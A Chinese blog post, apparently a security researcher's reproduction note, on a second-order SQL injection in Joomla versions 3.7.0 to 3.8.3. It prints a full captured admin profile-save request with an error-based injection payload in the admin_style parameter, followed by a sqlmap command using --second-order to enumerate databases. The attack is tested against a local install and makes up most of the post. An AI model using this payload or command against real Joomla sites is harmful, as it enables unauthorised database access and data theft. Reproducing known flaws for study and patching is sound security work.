zoukankan html css js c++ java

【复现】Joomla二阶注入

受影响Joomla版本：3.7.0 到 3.8.3

1、下载安装Joomla3.8.3，登录后台管理系统：http://127.0.0.1/joomla/administrator/index.php

2、访问编辑个人信息界面：

http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=769

点击保存按钮，抓取数据包为（红色代码为测试payload）：

POST /joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:58.0) Gecko/20100101 Firefox/58.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/joomla/administrator/index.php?option=com_admin&view=profile&layout=edit&id=771
Content-Type: multipart/form-data; boundary=---------------------------132821454821567
Content-Length: 1875
Cookie: 52a41237bef72675e1ae3ded7fcac9e7=o4akcfu26k8ut4p2u3j0c31um5; b4ba6494ac7c9b13e2a8532fc8b0d563=giuboaa1n9rpocc0qbvg0agnn5
Connection: keep-alive
Upgrade-Insecure-Requests: 1

-----------------------------132821454821567
Content-Disposition: form-data; name="jform[name]"

savan
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[username]"

savan
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[password2]"


-----------------------------132821454821567
Content-Disposition: form-data; name="jform[password]"


-----------------------------132821454821567
Content-Disposition: form-data; name="jform[email]"

2@qq.com
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[registerDate]"

2018-02-28 09:13:57
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[lastvisitDate]"

2018-03-01 06:29:04
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[id]"

771
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][admin_style][0]"

extractvalue(1,concat(0x7e,(select version()) *))
-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][admin_language]"


-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][language]"


-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][editor]"


-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][helpsite]"


-----------------------------132821454821567
Content-Disposition: form-data; name="jform[params][timezone]"


-----------------------------132821454821567
Content-Disposition: form-data; name="task"

profile.apply
-----------------------------132821454821567
Content-Disposition: form-data; name="f054a37efb023faabe817c77a5a97583"

1
-----------------------------132821454821567--

3、sqlmap对上述数据包进行测试

sqlmap.py -r C:Users18721Desktop1.txt --dbms mysql --tech E --second-order "http://127.0.0.1/joomla/administrator/index.php" --dbs --batch

查看全文

相关阅读:
解决：IIS APPPOOLDefaultAppPool 登录失败的问题
 C#操作txt文件并清空添加操作
 linux修改yum本地源的方法
 CentOS防火墙开启、关闭与开放指定端口
 CentOS配置SSH远程连接
 判断js对象是否拥有某一个属性的js代码
 bash脚本输入密码不回显问题的解决方法
 js控制表单操作的常用代码小结
 绝版Node--Sequlize搭建服务（Node全栈之路二）
绝版Node--Sequlize搭建服务（Node全栈之路）

原文地址：https://www.cnblogs.com/peterpan0707007/p/8489368.html